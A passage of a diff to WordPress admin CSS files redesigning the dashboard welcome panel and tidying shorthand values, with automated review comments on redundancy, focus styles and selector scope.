+		box-sizing: border-box;
1372
+		padding: 32px;
1373
+		width: 100%;
1374
+	}
1375
+
1376
+	.welcome-panel .welcome-panel-column-content {
1377
+		max-width: 520px;
1378
+	}
1379
+
1380
+	/* Keep the close icon from overlapping the Welcome text. */
1381
+	.welcome-panel .welcome-panel-close {
1382
+		overflow: hidden;
1383
+		text-indent: 40px;
1384
+		white-space: nowrap;
1385
+		width: 20px;
1386
+		height: 20px;
1387
+		padding: 5px;
1388
+		top: 5px;
1389
+		left: 5px;
1390
+	}
1391
+
1392
+	.welcome-panel .welcome-panel-close::before {
1393
+		top: 5px;
1394
+		right: -35px;
1395
+	}
1396
+
1236 1397
 	#dashboard-widgets h2 {
1237 1398
 		padding: 12px;
1238 1399
 	}
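Review bot: In the `max-width: 782px` block, `.welcome-panel .welcome-panel-column-container` re-declares `box-sizing: border-box` and `width: 100%`, which the base rule added earlier in this file already sets; only `grid-template-columns: 1fr` and `padding: 32px` differ at this breakpoint and the other two declarations can go. The new `max-width: 1180px` and `min-width: 783px` block is also identical to the `max-width: 360px` block added in the next hunk, so a short comment explaining why icons are hidden in those two ranges but shown in between would help the next reader.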
@@ -1275,23 +1436,28 @@ a.rsswidget {
1275 1436
 
1276 1437
 /* Smartphone */
1277 1438
 @media screen and (max-width: 600px) {
1278
-	/* Keep the close icon from overlapping the Welcome text. */
1279
-	.welcome-panel .welcome-panel-close {
1280
-		overflow: hidden;
1281
-		text-indent: 40px;
1282
-		white-space: nowrap;
1283
-		width: 20px;
1284
-		height: 20px;
1285
-		padding: 5px;
1286
-		top: 5px;
1287
-		left: 5px;
1439
+	.welcome-panel-header {
1440
+		padding: 32px 32px 64px;
1288 1441
 	}
1289 1442
 
1290
-	/* Make the close icon larger for tappability. */
1291
-	.welcome-panel .welcome-panel-close:before {
1292
-		font-size: 20px;
1293
-		top: 5px;
1294
-		right: -35px;
1443
+	.welcome-panel-header-image {
1444
+		display: none;
1445
+	}
1446
+}
1447
+
1448
+@media screen and (max-width: 480px) {
1449
+	.welcome-panel-column {
1450
+		gap: 16px;
1451
+	}
1452
+}
1453
+
1454
+@media screen and (max-width: 360px) {
1455
+	.welcome-panel-column {
1456
+		grid-template-columns: 1fr;
1457
+	}
1458
+
1459
+	[class*="welcome-panel-icon"] {
1460
+		display: none;
1295 1461
 	}
1296 1462
 }
1297 1463
 

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/dashboard-rtl.min.css


+ 225 - 59
app/wp-admin/css/dashboard.css

@@ -110,56 +110,95 @@
110 110
 	max-width: 100%;
111 111
 }
112 112
 
113
+/* Screen meta exception for when the "Dashboard" heading is missing or located below the Welcome Panel. */
114
+.index-php #screen-meta-links {
115
+	margin: 0 20px 8px 0;
116
+}
117
+
113 118
 /* Welcome Panel */
114 119
 .welcome-panel {
115 120
 	position: relative;
116 121
 	overflow: auto;
117 122
 	margin: 16px 0;
118
-	padding: 23px 10px 0;
119
-	border: 1px solid #c3c4c7;
120
-	box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04);
121
-	background: #fff;
122
-	font-size: 13px;
123
-	line-height: 1.7;
123
+	background-color: #e7ebfd;
124
+	font-size: 14px;
125
+	line-height: 1.3;
126
+	clear: both;
124 127
 }
125 128
 
126 129
 .welcome-panel h2 {
127 130
 	margin: 0;
128
-	font-size: 21px;
129
-	font-weight: 400;
130
-	line-height: 1.2;
131
+	font-size: 48px;
132
+	font-weight: 600;
133
+	line-height: 1.25;
131 134
 }
132 135
 
133 136
 .welcome-panel h3 {
134
-	margin: 1.33em 0 0;
135
-	font-size: 16px;
137
+	margin: 0;
138
+	font-size: 20px;
139
+	font-weight: 400;
140
+	line-height: 1.4;
136 141
 }
137 142
 
138
-.welcome-panel li {
139
-	font-size: 14px;
143
+.welcome-panel p {
144
+	font-size: inherit;
145
+	line-height: inherit;
140 146
 }
141 147
 
142
-.welcome-panel p {
143
-	color: #646970;
148
+.welcome-panel-header {
149
+	--about-header-image-width: 521px;
150
+	--about-header-bg-width: calc(var(--about-header-image-width) * 0.55);
151
+	--about-header-bg-offset-inline: 2rem;
152
+
153
+	position: relative;
144 154
 }
145 155
 
146
-.welcome-panel li a {
156
+.welcome-panel-header-image {
157
+	position: absolute;
158
+	top: -1rem;
159
+	right: var(--about-header-bg-offset-inline);
160
+	bottom: 0;
161
+	width: var(--about-header-bg-width);
162
+	height: auto;
163
+}
164
+
165
+.welcome-panel-header-image svg {
166
+	width: 100%;
167
+	height: auto;
168
+}
169
+
170
+.welcome-panel-header a {
171
+	color: inherit;
172
+}
173
+
174
+.welcome-panel-header a:focus,
175
+.welcome-panel-header a:hover {
176
+	color: inherit;
147 177
 	text-decoration: none;
148 178
 }
149 179
 
150
-.welcome-panel .about-description {
151
-	font-size: 16px;
152
-	margin: 0;
180
+.welcome-panel-header a:focus,
181
+.welcome-panel .welcome-panel-close:focus {
182
+	outline-color: currentColor;
183
+	outline-offset: 1px;
184
+	box-shadow: none;
185
+}
186
+
187
+.welcome-panel-header p {
188
+	margin: 0.5em 0 0;
189
+	font-size: 20px;
190
+	line-height: 1.4;
153 191
 }
154 192
 
155 193
 .welcome-panel .welcome-panel-close {
156 194
 	position: absolute;
157 195
 	top: 10px;
158 196
 	right: 10px;
159
-	padding: 10px 15px 10px 21px;
197
+	padding: 10px 15px 10px 24px;
160 198
 	font-size: 13px;
161 199
 	line-height: 1.23076923; /* Chrome rounding, needs to be 16px equivalent */
162 200
 	text-decoration: none;
201
+	z-index: 1; /* Raise above the version image. */
163 202
 }
164 203
 
165 204
 .welcome-panel .welcome-panel-close:before {
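Review bot: The rule for `.welcome-panel-header a:focus, .welcome-panel .welcome-panel-close:focus` removes the `box-shadow` focus ring and sets only `outline-color` and `outline-offset`, so keyboard focus stays visible only if some other rule supplies an `outline-style` and a non-zero `outline-width`; either declare the full `outline` here or add a comment naming the rule it depends on. The preceding `.welcome-panel-header a:focus, .welcome-panel-header a:hover` rule also sets `color: inherit` and `text-decoration: none`, which leaves hover with no visible change unless the link is underlined by default.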
@@ -167,8 +206,23 @@
167 206
 	top: 8px;
168 207
 	left: 0;
169 208
 	transition: all .1s ease-in-out;
209
+	content: '\f335';
210
+	font-size: 24px;
211
+	color: #1d2327;
170 212
 }
171 213
 
214
+.welcome-panel .welcome-panel-close {
215
+	color: #1d2327;
216
+}
217
+
218
+.welcome-panel .welcome-panel-close:hover,
219
+.welcome-panel .welcome-panel-close:focus,
220
+.welcome-panel .welcome-panel-close:hover::before,
221
+.welcome-panel .welcome-panel-close:focus::before {
222
+	color: #2271b1;
223
+}
224
+
225
+/* @deprecated 5.9.0 -- Button removed from panel. */
172 226
 .wp-core-ui .welcome-panel .button.button-hero {
173 227
 	margin: 15px 13px 3px 0;
174 228
 	padding: 12px 36px;
@@ -178,54 +232,98 @@
178 232
 }
179 233
 
180 234
 .welcome-panel-content {
181
-	margin-left: 13px;
235
+	min-height: 400px;
236
+	display: flex;
237
+	flex-direction: column;
238
+	justify-content: space-between;
239
+}
240
+
241
+.welcome-panel-header {
242
+	box-sizing: border-box;
243
+	margin-left: auto;
244
+	margin-right: auto;
182 245
 	max-width: 1500px;
246
+	width: 100%;
247
+	padding: 48px 0 80px 48px;
248
+	padding-right: calc(var(--about-header-bg-width) + (var(--about-header-bg-offset-inline) * 2));
183 249
 }
184 250
 
185 251
 .welcome-panel .welcome-panel-column-container {
252
+	box-sizing: border-box;
253
+	width: 100%;
186 254
 	clear: both;
187
-	position: relative;
255
+	display: grid;
256
+	z-index: 1;
257
+	padding: 48px;
258
+	grid-template-columns: repeat(3, 1fr);
259
+	gap: 32px;
260
+	align-self: flex-end;
261
+	background: #fff;
188 262
 }
189 263
 
190
-.welcome-panel .welcome-panel-column {
191
-	width: 32%;
192
-	min-width: 200px;
193
-	float: left;
264
+[class*="welcome-panel-icon"] {
265
+	height: 60px;
266
+	width: 60px;
267
+	background-color: #1d2327;
268
+	background-position: center;
269
+	background-size: 24px 24px;
270
+	background-repeat: no-repeat;
271
+	border-radius: 100%;
272
+}
273
+
274
+.welcome-panel-column {
275
+	display: grid;
276
+	grid-template-columns: min-content 1fr;
277
+	gap: 24px;
194 278
 }
195 279
 
196
-.welcome-panel .welcome-panel-column:first-child {
197
-	width: 36%;
280
+.welcome-panel-icon-pages {
281
+	background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24'%3E%3Cpath fill='%23fff' d='M7 13.8h6v-1.5H7v1.5zM18 16V4c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v12c0 1.1.9 2 2 2h10c1.1 0 2-.9 2-2zM5.5 16V4c0-.3.2-.5.5-.5h10c.3 0 .5.2.5.5v12c0 .3-.2.5-.5.5H6c-.3 0-.5-.2-.5-.5zM7 10.5h8V9H7v1.5zm0-3.3h8V5.8H7v1.4zM20.2 6v13c0 .7-.6 1.2-1.2 1.2H8v1.5h11c1.5 0 2.7-1.2 2.7-2.8V6h-1.5z' /%3E%3C/svg%3E");
198 282
 }
199 283
 
200
-.welcome-panel-column p.hide-if-no-customize {
201
-	margin-top: 10px;
284
+.welcome-panel-icon-layout {
285
+	background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24'%3E%3Cpath fill='%23fff' d='M18 5.5H6a.5.5 0 00-.5.5v3h13V6a.5.5 0 00-.5-.5zm.5 5H10v8h8a.5.5 0 00.5-.5v-7.5zm-10 0h-3V18a.5.5 0 00.5.5h2.5v-8zM6 4h12a2 2 0 012 2v12a2 2 0 01-2 2H6a2 2 0 01-2-2V6a2 2 0 012-2z' /%3E%3C/svg%3E");
202 286
 }
203 287
 
204
-.welcome-panel-column p {
205
-	margin-top: 7px;
206
-	color: #3c434a;
288
+.welcome-panel-icon-styles {
289
+	background-image: url("data:image/svg+xml,%3Csvg viewBox='0 0 24 24' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath fill='%23fff' d='M12 4c-4.4 0-8 3.6-8 8v.1c0 4.1 3.2 7.5 7.2 7.9h.8c4.4 0 8-3.6 8-8s-3.6-8-8-8zm0 15V5c3.9 0 7 3.1 7 7s-3.1 7-7 7z' /%3E%3C/svg%3E");
207 290
 }
208 291
 
292
+/* @deprecated 5.9.0 -- Section removed from welcome panel. */
209 293
 .welcome-panel .welcome-widgets-menus {
210 294
 	line-height: 1.14285714;
211 295
 }
212 296
 
297
+/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
213 298
 .welcome-panel .welcome-panel-column ul {
214 299
 	margin: 0.8em 1em 1em 0;
215 300
 }
216 301
 
302
+/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
303
+.welcome-panel li {
304
+	font-size: 14px;
305
+}
306
+
307
+/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
308
+.welcome-panel li a {
309
+	text-decoration: none;
310
+}
311
+
312
+/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
217 313
 .welcome-panel .welcome-panel-column li {
218 314
 	line-height: 1.14285714;
219 315
 	list-style-type: none;
220 316
 	padding: 0 0 8px;
221 317
 }
222 318
 
319
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
223 320
 .welcome-panel .welcome-icon {
224 321
 	background: transparent !important;
225 322
 }
226 323
 
227 324
 /* Welcome Panel and Right Now common Icons style */
228 325
 
326
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
229 327
 .welcome-panel .welcome-icon:before,
230 328
 #dashboard_right_now li a:before,
231 329
 #dashboard_right_now li span:before,
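Review bot: The `@deprecated 5.9.0 -- Icons removed from welcome panel.` comment added under "Welcome Panel and Right Now common Icons style" sits on a selector list that also contains `#dashboard_right_now li a:before` and `#dashboard_right_now li span:before`, so it reads as if the Right Now icon styles were deprecated as well; reword the comment to say that only the `.welcome-panel .welcome-icon:before` selector is deprecated, or split that selector into its own rule.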
@@ -244,47 +342,56 @@
244 342
 
245 343
 /* Welcome Panel specific Icons styles */
246 344
 
345
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
247 346
 .welcome-panel .welcome-write-blog:before,
248 347
 .welcome-panel .welcome-edit-page:before {
249 348
 	content: "\f119";
250 349
 	top: -3px;
251 350
 }
252 351
 
352
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
253 353
 .welcome-panel .welcome-add-page:before {
254 354
 	content: "\f132";
255 355
 	top: -1px;
256 356
 }
257 357
 
358
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
258 359
 .welcome-panel .welcome-setup-home:before {
259 360
 	content: "\f102";
260 361
 	top: -1px;
261 362
 }
262 363
 
364
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
263 365
 .welcome-panel .welcome-view-site:before {
264 366
 	content: "\f115";
265 367
 	top: -2px;
266 368
 }
267 369
 
370
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
268 371
 .welcome-panel .welcome-widgets-menus:before {
269 372
 	content: "\f116";
270 373
 	top: -2px;
271 374
 }
272 375
 
376
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
273 377
 .welcome-panel .welcome-widgets:before {
274 378
 	content: "\f538";
275 379
 	top: -2px;
276 380
 }
277 381
 
382
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
278 383
 .welcome-panel .welcome-menus:before {
279 384
 	content: "\f163";
280 385
 	top: -2px;
281 386
 }
282 387
 
388
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
283 389
 .welcome-panel .welcome-comments:before {
284 390
 	content: "\f117";
285 391
 	top: -1px;
286 392
 }
287 393
 
394
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
288 395
 .welcome-panel .welcome-learn-more:before {
289 396
 	content: "\f118";
290 397
 	top: -1px;
@@ -354,7 +461,7 @@
354 461
 .community-events-errors [aria-hidden="true"],
355 462
 .community-events-loading[aria-hidden="true"],
356 463
 .community-events[aria-hidden="true"],
357
-.community-events [aria-hidden="true"] {
464
+.community-events form[aria-hidden="true"] {
358 465
 	display: none;
359 466
 }
360 467
 
@@ -518,7 +625,7 @@ body #dashboard-widgets .postbox form .submit {
518 625
 
519 626
 #dashboard_primary .rss-widget {
520 627
 	font-size: 13px;
521
-	padding: 0 12px 0;
628
+	padding: 0 12px;
522 629
 }
523 630
 
524 631
 #dashboard_primary .rss-widget:last-child {
@@ -599,7 +706,7 @@ body #dashboard-widgets .postbox form .submit {
599 706
 	color: #50575e;
600 707
 	background: #f6f7f7;
601 708
 	border-top: 1px solid #f0f0f1;
602
-	padding: 10px 12px 6px 12px;
709
+	padding: 10px 12px 6px;
603 710
 }
604 711
 
605 712
 #dashboard_right_now .sub h3 {
@@ -835,7 +942,7 @@ body #dashboard-widgets .postbox form .submit {
835 942
 }
836 943
 
837 944
 #activity-widget #the-comment-list .comment-item p.row-actions {
838
-	margin: 4px 0 0 0;
945
+	margin: 4px 0 0;
839 946
 }
840 947
 
841 948
 #activity-widget #the-comment-list .comment-item:first-child {
@@ -1102,6 +1209,18 @@ a.rsswidget {
1102 1209
 /* =Media Queries
1103 1210
 -------------------------------------------------------------- */
1104 1211
 
1212
+@media only screen and (min-width: 1600px) {
1213
+	.welcome-panel .welcome-panel-column-container {
1214
+		display: flex;
1215
+		justify-content: center;
1216
+	}
1217
+
1218
+	.welcome-panel-column {
1219
+		width: 100%;
1220
+		max-width: 460px;
1221
+	}
1222
+}
1223
+
1105 1224
 /* one column on the dash */
1106 1225
 @media only screen and (max-width: 799px) {
1107 1226
 	#wpbody-content #dashboard-widgets .postbox-container {
@@ -1213,25 +1332,67 @@ a.rsswidget {
1213 1332
 }
1214 1333
 
1215 1334
 @media screen and (max-width: 870px) {
1216
-	.welcome-panel .welcome-panel-column,
1217
-	.welcome-panel .welcome-panel-column:first-child {
1218
-		display: block;
1219
-		float: none;
1220
-		width: 100%;
1221
-	}
1222
-
1335
+	/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
1223 1336
 	.welcome-panel .welcome-panel-column li {
1224 1337
 		display: inline-block;
1225 1338
 		margin-right: 13px;
1226 1339
 	}
1227 1340
 
1341
+	/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
1228 1342
 	.welcome-panel .welcome-panel-column ul {
1229 1343
 		margin: 0.4em 0 0;
1230 1344
 	}
1231 1345
 
1232 1346
 }
1233 1347
 
1348
+@media screen and (max-width: 1180px) and (min-width: 783px) {
1349
+	.welcome-panel-column {
1350
+		grid-template-columns: 1fr;
1351
+	}
1352
+
1353
+	[class*="welcome-panel-icon"] {
1354
+		display: none;
1355
+	}
1356
+}
1357
+
1234 1358
 @media screen and (max-width: 782px) {
1359
+	.welcome-panel-header {
1360
+		--about-header-bg-width: calc(var(--about-header-image-width) * 0.4);
1361
+		--about-header-bg-offset-inline: 1rem;
1362
+	}
1363
+
1364
+	.welcome-panel-header-image {
1365
+		top: 2rem;
1366
+	}
1367
+
1368
+	.welcome-panel .welcome-panel-column-container {
1369
+		grid-template-columns: 1fr;
1370
+		box-sizing: border-box;
1371
+		padding: 32px;
1372
+		width: 100%;
1373
+	}
1374
+
1375
+	.welcome-panel .welcome-panel-column-content {
1376
+		max-width: 520px;
1377
+	}
1378
+
1379
+	/* Keep the close icon from overlapping the Welcome text. */
1380
+	.welcome-panel .welcome-panel-close {
1381
+		overflow: hidden;
1382
+		text-indent: 40px;
1383
+		white-space: nowrap;
1384
+		width: 20px;
1385
+		height: 20px;
1386
+		padding: 5px;
1387
+		top: 5px;
1388
+		right: 5px;
1389
+	}
1390
+
1391
+	.welcome-panel .welcome-panel-close::before {
1392
+		top: 5px;
1393
+		left: -35px;
1394
+	}
1395
+
1235 1396
 	#dashboard-widgets h2 {
1236 1397
 		padding: 12px;
1237 1398
 	}
@@ -1274,23 +1435,28 @@ a.rsswidget {
1274 1435
 
1275 1436
 /* Smartphone */
1276 1437
 @media screen and (max-width: 600px) {
1277
-	/* Keep the close icon from overlapping the Welcome text. */
1278
-	.welcome-panel .welcome-panel-close {
1279
-		overflow: hidden;
1280
-		text-indent: 40px;
1281
-		white-space: nowrap;
1282
-		width: 20px;
1283
-		height: 20px;
1284
-		padding: 5px;
1285
-		top: 5px;
1286
-		right: 5px;
1438
+	.welcome-panel-header {
1439
+		padding: 32px 32px 64px;
1287 1440
 	}
1288 1441
 
1289
-	/* Make the close icon larger for tappability. */
1290
-	.welcome-panel .welcome-panel-close:before {
1291
-		font-size: 20px;
1292
-		top: 5px;
1293
-		left: -35px;
1442
+	.welcome-panel-header-image {
1443
+		display: none;
1444
+	}
1445
+}
1446
+
1447
+@media screen and (max-width: 480px) {
1448
+	.welcome-panel-column {
1449
+		gap: 16px;
1450
+	}
1451
+}
1452
+
1453
+@media screen and (max-width: 360px) {
1454
+	.welcome-panel-column {
1455
+		grid-template-columns: 1fr;
1456
+	}
1457
+
1458
+	[class*="welcome-panel-icon"] {
1459
+		display: none;
1294 1460
 	}
1295 1461
 }
1296 1462
 

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/dashboard.min.css


+ 1 - 1
app/wp-admin/css/deprecated-media-rtl.css

@@ -101,7 +101,7 @@ th {
101 101
 	width: 100%;
102 102
 	border: none;
103 103
 	text-align: justify;
104
-	margin: 0 0 1em 0;
104
+	margin: 0 0 1em;
105 105
 	padding: 0;
106 106
 }
107 107
 

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/deprecated-media-rtl.min.css


+ 1 - 1
app/wp-admin/css/deprecated-media.css

@@ -100,7 +100,7 @@ th {
100 100
 	width: 100%;
101 101
 	border: none;
102 102
 	text-align: justify;
103
-	margin: 0 0 1em 0;
103
+	margin: 0 0 1em;
104 104
 	padding: 0;
105 105
 }
106 106
 

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/deprecated-media.min.css


+ 17 - 11
app/wp-admin/css/edit-rtl.css

@@ -98,6 +98,12 @@ input#link_url {
98 98
 	color: #646970;
99 99
 }
100 100
 
101
+#sample-permalink {
102
+	display: inline-block;
103
+	max-width: 100%;
104
+	word-wrap: break-word;
105
+}
106
+
101 107
 #edit-slug-box .cancel {
102 108
 	margin-left: 10px;
103 109
 	padding: 0;
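Review bot: The new `#sample-permalink` rule uses `word-wrap: break-word`, which is the legacy alias; add `overflow-wrap: break-word` alongside it so the rule does not depend on the alias alone. A one-line comment stating that the rule exists to keep long permalinks inside the slug box would also document why `display: inline-block` and `max-width: 100%` are needed.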
@@ -147,6 +153,11 @@ body.post-new-php .submitbox .submitdelete {
147 153
 	margin-top: 3px;
148 154
 }
149 155
 
156
+body.post-type-wp_navigation div#minor-publishing,
157
+body.post-type-wp_navigation .inline-edit-status {
158
+	display: none;
159
+}
160
+
150 161
 /* Post Screen */
151 162
 
152 163
 /* Only highlight drop zones when dragging and only in the 2 columns layout. */
@@ -451,7 +462,7 @@ form#tags-filter {
451 462
 }
452 463
 
453 464
 .curtime #timestamp {
454
-	padding: 2px 0 1px 0;
465
+	padding: 2px 0 1px;
455 466
 	display: inline !important;
456 467
 	height: auto !important;
457 468
 }
@@ -651,7 +662,7 @@ form#tags-filter {
651 662
 }
652 663
 
653 664
 #poststuff .inside {
654
-	margin: 6px 0 0 0;
665
+	margin: 6px 0 0;
655 666
 }
656 667
 
657 668
 .link-php #poststuff .inside,
@@ -722,7 +733,7 @@ form#tags-filter {
722 733
 	font-weight: 600;
723 734
 	margin: 0 0.8rem 1rem;
724 735
 	font-size: 23px;
725
-	padding: 9px 0 4px 0;
736
+	padding: 9px 0 4px;
726 737
 	line-height: 1.3;
727 738
 }
728 739
 
@@ -1364,7 +1375,7 @@ p.description code {
1364 1375
 }
1365 1376
 
1366 1377
 #poststuff .tagsdiv .howto {
1367
-	margin: 1em 0 6px 0;
1378
+	margin: 1em 0 6px;
1368 1379
 }
1369 1380
 
1370 1381
 .ajaxtag .newtag {
@@ -1773,7 +1784,7 @@ table.links-table {
1773 1784
 	}
1774 1785
 
1775 1786
 	#titlediv #title-prompt-text {
1776
-		padding: 10px 10px;
1787
+		padding: 10px;
1777 1788
 	}
1778 1789
 
1779 1790
 	#poststuff .stuffbox .inside {
@@ -1956,12 +1967,7 @@ table.links-table {
1956 1967
 	}
1957 1968
 
1958 1969
 	.misc-pub-section {
1959
-		padding: 20px 10px 20px;
1960
-	}
1961
-
1962
-	.misc-pub-section > a {
1963
-		float: left;
1964
-		font-size: 16px;
1970
+		padding: 20px 10px;
1965 1971
 	}
1966 1972
 
1967 1973
 	#delete-action,

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/edit-rtl.min.css


+ 17 - 11
app/wp-admin/css/edit.css

@@ -97,6 +97,12 @@ input#link_url {
97 97
 	color: #646970;
98 98
 }
99 99
 
100
+#sample-permalink {
101
+	display: inline-block;
102
+	max-width: 100%;
103
+	word-wrap: break-word;
104
+}
105
+
100 106
 #edit-slug-box .cancel {
101 107
 	margin-right: 10px;
102 108
 	padding: 0;
@@ -146,6 +152,11 @@ body.post-new-php .submitbox .submitdelete {
146 152
 	margin-top: 3px;
147 153
 }
148 154
 
155
+body.post-type-wp_navigation div#minor-publishing,
156
+body.post-type-wp_navigation .inline-edit-status {
157
+	display: none;
158
+}
159
+
149 160
 /* Post Screen */
150 161
 
151 162
 /* Only highlight drop zones when dragging and only in the 2 columns layout. */
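Review bot: The added `body.post-type-wp_navigation div#minor-publishing, body.post-type-wp_navigation .inline-edit-status { display: none; }` rule only hides the status controls; any form fields inside them stay in the DOM and are still submitted, so if status changes for this post type are meant to be blocked, that has to be enforced in the save handler and not by this stylesheet. The `div` qualifier on `div#minor-publishing` adds specificity without narrowing the match and can be dropped unless it is there to override another rule, in which case a comment should say so.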
@@ -450,7 +461,7 @@ form#tags-filter {
450 461
 }
451 462
 
452 463
 .curtime #timestamp {
453
-	padding: 2px 0 1px 0;
464
+	padding: 2px 0 1px;
454 465
 	display: inline !important;
455 466
 	height: auto !important;
456 467
 }
@@ -650,7 +661,7 @@ form#tags-filter {
650 661
 }
651 662
 
652 663
 #poststuff .inside {
653
-	margin: 6px 0 0 0;
664
+	margin: 6px 0 0;
654 665
 }
655 666
 
656 667
 .link-php #poststuff .inside,
@@ -721,7 +732,7 @@ form#tags-filter {
721 732
 	font-weight: 600;
722 733
 	margin: 0 0.8rem 1rem;
723 734
 	font-size: 23px;
724
-	padding: 9px 0 4px 0;
735
+	padding: 9px 0 4px;
725 736
 	line-height: 1.3;
726 737
 }
727 738
 
@@ -1363,7 +1374,7 @@ p.description code {
1363 1374
 }
1364 1375
 
1365 1376
 #poststuff .tagsdiv .howto {
1366
-	margin: 1em 0 6px 0;
1377
+	margin: 1em 0 6px;
1367 1378
 }
1368 1379
 
1369 1380
 .ajaxtag .newtag {
@@ -1772,7 +1783,7 @@ table.links-table {
1772 1783
 	}
1773 1784
 
1774 1785
 	#titlediv #title-prompt-text {
1775
-		padding: 10px 10px;
1786
+		padding: 10px;
1776 1787
 	}
1777 1788
 
1778 1789
 	#poststuff .stuffbox .inside {
@@ -1955,12 +1966,7 @@ table.links-table {
1955 1966
 	}
1956 1967
 
1957 1968
 	.misc-pub-section {
1958
-		padding: 20px 10px 20px;
1959
-	}
1960
-
1961
-	.misc-pub-section > a {
1962
-		float: right;
1963
-		font-size: 16px;
1969
+		padding: 20px 10px;
1964 1970
 	}
1965 1971
 
1966 1972
 	#delete-action,

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/edit.min.css


+ 15 - 8
app/wp-admin/css/forms-rtl.css

@@ -33,7 +33,7 @@ select {
33 33
 }
34 34
 
35 35
 textarea.code {
36
-	padding: 4px 6px 1px 6px;
36
+	padding: 4px 6px 1px;
37 37
 }
38 38
 
39 39
 input[type="text"],
@@ -1000,8 +1000,8 @@ table.form-table td .updated p {
1000 1000
 
1001 1001
 .pressthis-bookmarklet span {
1002 1002
 	display: inline-block;
1003
-	margin: 0px 0 0;
1004
-	padding: 0px 9px 8px 12px;
1003
+	margin: 0;
1004
+	padding: 0 9px 8px 12px;
1005 1005
 }
1006 1006
 
1007 1007
 .pressthis-bookmarklet span:before {
@@ -1226,7 +1226,7 @@ table.form-table td .updated p {
1226 1226
 }
1227 1227
 
1228 1228
 .request-filesystem-credentials-form .notice {
1229
-	margin: 0 0 20px 0;
1229
+	margin: 0 0 20px;
1230 1230
 	clear: both;
1231 1231
 }
1232 1232
 
@@ -1237,11 +1237,14 @@ table.form-table td .updated p {
1237 1237
 	margin-bottom: 1.3em;
1238 1238
 }
1239 1239
 
1240
-.tools-privacy-policy-page input.button,
1241
-.tools-privacy-policy-page select {
1240
+.tools-privacy-policy-page input.button {
1242 1241
 	margin: 0 6px 0 1px;
1243 1242
 }
1244 1243
 
1244
+.tools-privacy-policy-page select {
1245
+	margin: 0 6px 0.5em 1px;
1246
+}
1247
+
1245 1248
 .tools-privacy-edit {
1246 1249
 	margin: 1.5em 0;
1247 1250
 }
@@ -1526,6 +1529,10 @@ table.form-table td .updated p {
1526 1529
 		margin: 0 3px;
1527 1530
 	}
1528 1531
 
1532
+	.form-table .regular-text ~ input[type="text"].small-text {
1533
+		margin-top: 5px;
1534
+	}
1535
+
1529 1536
 	#pass-strength-result {
1530 1537
 		width: 100%;
1531 1538
 		box-sizing: border-box;
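Review bot: The new `.form-table .regular-text ~ input[type="text"].small-text` selector uses the general sibling combinator, so `margin-top: 5px` applies to every later `.small-text` text input that shares a parent with a `.regular-text` element, not only the one directly after it; if the intent is the input that wraps below its neighbour, `+` is the tighter match. The rule has no comment saying which form it targets, which makes it hard to verify against other settings screens.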
@@ -1560,13 +1567,13 @@ table.form-table td .updated p {
1560 1567
 	}
1561 1568
 
1562 1569
 	.form-table th {
1563
-		padding: 10px 0 0 0;
1570
+		padding: 10px 0 0;
1564 1571
 		border-bottom: 0;
1565 1572
 	}
1566 1573
 
1567 1574
 	.form-table td {
1568 1575
 		margin-bottom: 0;
1569
-		padding: 4px 0 6px 0;
1576
+		padding: 4px 0 6px;
1570 1577
 	}
1571 1578
 
1572 1579
 	.form-table.permalink-structure td code {

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/forms-rtl.min.css


+ 15 - 8
app/wp-admin/css/forms.css

@@ -32,7 +32,7 @@ select {
32 32
 }
33 33
 
34 34
 textarea.code {
35
-	padding: 4px 6px 1px 6px;
35
+	padding: 4px 6px 1px;
36 36
 }
37 37
 
38 38
 input[type="text"],
@@ -999,8 +999,8 @@ table.form-table td .updated p {
999 999
 
1000 1000
 .pressthis-bookmarklet span {
1001 1001
 	display: inline-block;
1002
-	margin: 0px 0 0;
1003
-	padding: 0px 12px 8px 9px;
1002
+	margin: 0;
1003
+	padding: 0 12px 8px 9px;
1004 1004
 }
1005 1005
 
1006 1006
 .pressthis-bookmarklet span:before {
@@ -1225,7 +1225,7 @@ table.form-table td .updated p {
1225 1225
 }
1226 1226
 
1227 1227
 .request-filesystem-credentials-form .notice {
1228
-	margin: 0 0 20px 0;
1228
+	margin: 0 0 20px;
1229 1229
 	clear: both;
1230 1230
 }
1231 1231
 
@@ -1236,11 +1236,14 @@ table.form-table td .updated p {
1236 1236
 	margin-bottom: 1.3em;
1237 1237
 }
1238 1238
 
1239
-.tools-privacy-policy-page input.button,
1240
-.tools-privacy-policy-page select {
1239
+.tools-privacy-policy-page input.button {
1241 1240
 	margin: 0 1px 0 6px;
1242 1241
 }
1243 1242
 
1243
+.tools-privacy-policy-page select {
1244
+	margin: 0 1px 0.5em 6px;
1245
+}
1246
+
1244 1247
 .tools-privacy-edit {
1245 1248
 	margin: 1.5em 0;
1246 1249
 }
@@ -1525,6 +1528,10 @@ table.form-table td .updated p {
1525 1528
 		margin: 0 3px;
1526 1529
 	}
1527 1530
 
1531
+	.form-table .regular-text ~ input[type="text"].small-text {
1532
+		margin-top: 5px;
1533
+	}
1534
+
